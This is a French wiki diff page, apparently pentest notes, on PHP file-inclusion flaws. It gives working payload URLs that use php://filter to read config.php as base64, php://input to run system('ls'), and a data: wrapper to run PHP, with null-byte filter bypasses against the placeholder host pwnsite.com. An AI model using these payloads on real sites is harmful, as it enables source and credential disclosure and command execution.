« 1.8 Failles include » : différence entre les versions
		
		
		
		
		
		Aller à la navigation
		Aller à la recherche
		
				
		
		
	
Aucun résumé des modifications  | 
				Aucun résumé des modifications  | 
				||
| Ligne 5 : | Ligne 5 : | ||
Reste plus qu'à le décoder pour avoir la page en clair  | 
  Reste plus qu'à le décoder pour avoir la page en clair  | 
||
  echo "cHJvdXQ=" | base64 -d  | 
    echo "cHJvdXQ=" | base64 -d  | 
||
On peut executer aussi des commandes en utilisant php://input ou data:text/plaintext (le null byte est nécessaire suivant le filtre..)  | 
|||
  http://www.pwnsite.com/index.php?page=php://input%00 (passé en paramètre POST <? system("ls"); ?>)  | 
|||
  http://www.pwnsite.com/index.php?page=data:text/plaintext,<?php $files = scandir('./');print_r($files); ?>%00  | 
|||
Dernière version du 23 août 2015 à 20:49
Lire un script PHP à la volé mettre dans l'include:
http://www.pwnsite.com/index.php?page=php://filter/convert.base64-encode/resource=config.php%00
Reste plus qu'à le décoder pour avoir la page en clair
echo "cHJvdXQ=" | base64 -d
On peut executer aussi des commandes en utilisant php://input ou data:text/plaintext (le null byte est nécessaire suivant le filtre..)
http://www.pwnsite.com/index.php?page=php://input%00 (passé en paramètre POST <? system("ls"); ?>) http://www.pwnsite.com/index.php?page=data:text/plaintext,<?php $files = scandir('./');print_r($files); ?>%00